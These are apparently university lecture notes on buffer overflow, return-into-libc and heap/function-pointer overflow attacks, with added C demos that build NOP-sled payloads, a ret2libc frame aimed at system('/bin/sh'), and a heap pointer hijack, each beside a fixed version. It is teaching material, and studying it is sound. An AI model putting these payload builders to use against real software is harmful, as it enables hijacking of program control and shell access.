2014.10.08
The Attack and Defense of Computers 141008
Dr. Fu-Hau Hsu (許富皓)





Buffer Overflow Attacks and Heap Overflow Attacks


 
Basically started from 2-10
 
BOAs (Buffer Overflow Attacks) => implant malware through a buffer-overflow vulnerability.
           (Exam question!!!) Def: the input is longer than the storage reserved for it, so the adjacent buffer gets overwritten.
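Worked example of the definition above, added here and not taken from the slides: a stack frame in which an 8-byte name buffer sits directly in front of a privilege flag, as in the lecture's diagram. The vulnerable copy trusts the input length, so bytes 8..11 of the input land in `is_admin`; the fixed copy bounds the length by the destination. The struct, function names and the 12-byte attack input are constructed for the demo.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Two locals laid out as in the lecture's diagram: the input buffer first,
 * a privilege flag immediately after it. (Field order inside a struct is
 * guaranteed, which makes the overwrite reproducible on any compiler.) */
struct login_frame {
    char name[8];     /* the buffer that is overflowed                */
    int  is_admin;    /* the "adjacent buffer" that gets overwritten  */
};

/* Vulnerable: copies len bytes although name[] holds only 8, so input
 * bytes 8..11 land in is_admin. The copy is clamped to the frame size only
 * so that this demo cannot crash; a real strcpy() would keep going into the
 * saved ebp and the return address. */
int unsafe_login(const char *input, size_t len)
{
    struct login_frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f)
        len = sizeof f;
    memcpy((char *)&f, input, len);   /* runs straight across the field boundary */
    return f.is_admin;
}

/* Fixed: the copy length is bounded by the destination, not by the input. */
int safe_login(const char *input, size_t len)
{
    struct login_frame f;
    memset(&f, 0, sizeof f);
    size_t n = sizeof f.name - 1;     /* keep one byte for the terminator */
    if (len < n)
        n = len;
    memcpy(f.name, input, n);
    f.name[n] = '\0';
    return f.is_admin;
}

/* Constructed attack input (not from the slides): 8 filler bytes for
 * name[], then 4 non-zero bytes that become the new is_admin value
 * (non-zero whatever the byte order). */
static const char attack_input[] = "AAAAAAAA\x01\x01\x01\x01";
#define ATTACK_LEN 12

int main(void)
{
    printf("is_admin offset: %zu\n", offsetof(struct login_frame, is_admin));
    printf("unsafe_login(attack): %d\n", unsafe_login(attack_input, ATTACK_LEN));
    printf("safe_login(attack):   %d\n", safe_login(attack_input, ATTACK_LEN));
    return 0;
}
```

The same principle applies when the thing after the buffer is the saved ebp or the return address instead of a flag; only the consequence changes (control flow instead of a privilege bit).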
 
# The attacker creates a shell => root privilege (shellcode = the attacker's code)
Q: How does the attacker know the size and location of the buffer?
A: Increase the number of attack attempts to raise the probability of success (Right Place, Correct Value);
EX. repeat the address pattern; insert NOPs (single-byte / multi-byte).
The slides describe the ideal case; in practice instructions differ across hardware, so the exact layout cannot be predicted.

# Non-predictable offset
Source code and local binaries don't help (different compiler, different OS/compiler version); address obfuscation (insert a random amount of space between the local variables and the return address) leaves the attacker relying on luck.
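Added example (not from the slides) of the two tricks above, "Right Place, Correct Value": build the classic `[NOP sled][shellcode][guessed address x N]` payload, then simulate where execution ends up for every possible landing point. A sled of N bytes turns one correct guess into N+1 acceptable guesses, and repeating the address means an off-by-a-few-words guess of the return-address slot still works. The shellcode bytes (four `int3`) and the guessed address `0xbffff5c0` are placeholders constructed for the demo, not values from any real target.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90   /* x86 single-byte NOP */

/* Constructed stand-in for shellcode: four int3 (0xCC) bytes, chosen only
 * because they are not NOPs. Real shellcode would go here. */
static const uint8_t shellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Hypothetical guessed address of the buffer on the victim's stack. */
#define GUESSED_ADDR 0xbffff5c0u

/* Return addresses are stored little-endian on x86. */
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v);
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Classic payload layout:  [NOP sled][shellcode][guessed address x N].
 * Repeating the address lets the exploit work even if the guess of where
 * the saved return address sits is off by a few words. Returns the bytes
 * written, or 0 if out[] is too small. */
size_t build_payload(uint8_t *out, size_t cap, size_t sled_len,
                     const uint8_t *sc, size_t sc_len,
                     uint32_t addr, size_t addr_repeats)
{
    size_t total = sled_len + sc_len + 4 * addr_repeats;
    if (total > cap)
        return 0;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    for (size_t i = 0; i < addr_repeats; i++)
        put_le32(out + sled_len + sc_len + 4 * i, addr);
    return total;
}

/* Model execution resuming at byte `landing` of the payload: the CPU eats
 * NOPs until it meets a non-NOP byte. Returns that byte's offset, or -1 if
 * it ran off the end. The attack works only if the result is the start of
 * the shellcode (== sled_len); landing inside the shellcode is a failure. */
long simulate_landing(const uint8_t *payload, size_t len, size_t landing)
{
    size_t pc = landing;
    while (pc < len && payload[pc] == NOP)
        pc++;
    return pc < len ? (long)pc : -1;
}

/* Count the landing points from which the shellcode is reached: a sled of
 * sled_len bytes tolerates sled_len + 1 different guesses instead of one. */
size_t successful_landings(size_t sled_len)
{
    uint8_t buf[256];
    size_t n = build_payload(buf, sizeof buf, sled_len, shellcode,
                             sizeof shellcode, GUESSED_ADDR, 8);
    size_t hits = 0;
    for (size_t landing = 0; landing < n; landing++)
        if (simulate_landing(buf, n, landing) == (long)sled_len)
            hits++;
    return hits;
}

int main(void)
{
    for (size_t sled = 0; sled <= 64; sled += 16)
        printf("sled %2zu bytes -> %2zu landing points hit the shellcode\n",
               sled, successful_landings(sled));
    return 0;
}
```

The simulation assumes the guessed address itself contains no 0x90 byte; if it did, a landing inside the address tail would also "slide", which is harmless for the attacker but would distort the count.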
          
# Return-into-libc Attacks (slides 2-29~33, important!)
           A mutation of buffer overflow attacks.
           Origin: the attacker used to bring their own program in => instead, reuse code that already exists in the process and only change the address the (return) pointer points to.
           EX. the function system("/bin/sh") => spawns a shell (executes a program).
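Added example, not from the slides, of the stack image a return-into-libc overflow has to produce on 32-bit x86 so that the function's `ret` lands in `system("/bin/sh")` without any injected code. The builder writes the padding, then three words in the order `system()`'s calling convention expects; `first_nul` is the practical pre-flight check that a `strcpy()`-style overflow would not be cut short by a zero byte. The three addresses in `demo_frame` are hypothetical and come from no real system.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit x86, cdecl. When the vulnerable function executes `ret`, the word
 * sitting in the saved-return-address slot is popped into EIP. If that word
 * is the address of system(), system() starts running and, by the normal
 * calling convention, expects the stack to look like this from ESP:
 *
 *     [ return address for system() ][ arg0 = pointer to "/bin/sh" ]
 *
 * So after the padding the overflow writes exactly three words:
 *   system_addr  -> replaces the saved return address
 *   fake_return  -> where system() returns to (often &exit, so the
 *                   process ends quietly instead of crashing)
 *   arg_binsh    -> pointer to a "/bin/sh" string already in memory
 * No attacker code is injected; existing code is only re-pointed. */
struct ret2libc_frame {
    uint32_t system_addr;
    uint32_t fake_return;
    uint32_t arg_binsh;
};

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v);
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Build the overflow string: `padding` bytes to get from the start of the
 * buffer to the saved return address (covers the locals and the saved ebp),
 * then the three words. Returns bytes written, 0 if out[] is too small. */
size_t build_ret2libc(uint8_t *out, size_t cap, size_t padding,
                      const struct ret2libc_frame *fr)
{
    size_t total = padding + 3 * sizeof(uint32_t);
    if (total > cap)
        return 0;
    memset(out, 'A', padding);
    put_le32(out + padding,     fr->system_addr);
    put_le32(out + padding + 4, fr->fake_return);
    put_le32(out + padding + 8, fr->arg_binsh);
    return total;
}

/* Practical check before sending: a strcpy()-style overflow stops at the
 * first NUL byte, so none of the addresses may contain 0x00. Returns the
 * offset of the first NUL, or -1 if the payload is clean. */
long first_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

/* Hypothetical addresses for illustration only; on a real target they
 * come from the debugger or the libc symbol table. */
static const struct ret2libc_frame demo_frame = {
    0xb7e5f430u,  /* &system    */
    0xb7e52fb0u,  /* &exit      */
    0xb7f8cc58u,  /* &"/bin/sh" */
};

int main(void)
{
    uint8_t buf[128];
    size_t n = build_ret2libc(buf, sizeof buf, 16, &demo_frame);
    printf("payload: %zu bytes, first NUL at %ld\n", n, first_nul(buf, n));
    return 0;
}
```

With address randomization the three words change on every run, which is why the slides list address obfuscation as a defense; the frame shape itself, however, is fixed by the calling convention.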
 
2-23 Addressing locals relative to ebp
Before the code runs -> assembly -> stack frame
* moving ebp => the memory block may still hold stale values from earlier calls

# Prologue and Epilogue (2-25~26)

# Heap/Data/BSS Overflow Attacks
BSS: not stored in the executable file; usually holds uninitialized global variables (the file records only the type and how much space is needed, and the loader zero-fills it at start-up).

* The data section is initialized at compile time.
 
2-39
Applications of BOAs: change the object the program operates on rather than the program's code.
# Function Pointer Attack
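Added example (not from the slides) combining the last two points: a heap object in which a 16-byte name buffer is followed by a callback pointer. Overflowing the name rewrites the pointer, so the next dispatch runs the attacker's chosen function even though not one instruction of the program was modified; only the data it operates on changed. The struct, the two handlers and the attack input are constructed for the demo; `attacker_handler` stands in for whatever the pointer would really be aimed at.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A heap object with a fixed-size name followed by a callback pointer, a
 * layout that is common in real programs. Because the two fields are
 * adjacent, overflowing name[] rewrites handler. */
struct request {
    char name[16];
    int (*handler)(void);   /* sits right after name[] at offset 16 */
};

static int normal_handler(void) { return 0; }

/* Stand-in for the attacker's target. In a real attack this would be
 * shellcode or a libc function such as system(); here it is an ordinary
 * function so the hijacked call can be observed safely. */
static int attacker_handler(void) { return 42; }

/* Vulnerable: the attacker-controlled input is copied into the heap object
 * without regard to the size of name[], then the program dispatches through
 * the (now attacker-chosen) pointer. The clamp to sizeof *r is there only
 * so the demo never writes past its own chunk into heap metadata. */
int dispatch_unsafe(const unsigned char *input, size_t len)
{
    struct request *r = malloc(sizeof *r);
    if (r == NULL)
        return -1;
    memset(r, 0, sizeof *r);
    r->handler = normal_handler;
    if (len > sizeof *r)
        len = sizeof *r;
    memcpy((unsigned char *)r, input, len);   /* bytes 16.. overwrite handler */
    int rc = r->handler();                     /* control flow now attacker's */
    free(r);
    return rc;
}

/* Fixed: the copy is bounded by the destination field, so handler is
 * never touched by input. */
int dispatch_safe(const unsigned char *input, size_t len)
{
    struct request *r = malloc(sizeof *r);
    if (r == NULL)
        return -1;
    memset(r, 0, sizeof *r);
    r->handler = normal_handler;
    size_t n = sizeof r->name - 1;
    if (len < n)
        n = len;
    memcpy(r->name, input, n);
    r->name[n] = '\0';
    int rc = r->handler();
    free(r);
    return rc;
}

/* Constructed attack input: fill name[] up to the pointer, then append the
 * raw bytes of the pointer value handler should become. Returns the length,
 * or 0 if out[] is too small. */
size_t make_attack_input(unsigned char *out, size_t cap)
{
    int (*target)(void) = attacker_handler;
    size_t off = offsetof(struct request, handler);
    if (off + sizeof target > cap)
        return 0;
    memset(out, 'A', off);
    memcpy(out + off, &target, sizeof target);
    return off + sizeof target;
}

int main(void)
{
    unsigned char in[64];
    size_t n = make_attack_input(in, sizeof in);
    printf("unsafe dispatch -> %d (attacker's function ran)\n", dispatch_unsafe(in, n));
    printf("safe dispatch   -> %d\n", dispatch_safe(in, n));
    return 0;
}
```

The same overwrite works for a function pointer kept in the data or BSS section next to a global buffer; the only difference is that global placement is decided by the linker rather than by malloc, so the attacker reads the distance from the binary instead of from the allocator.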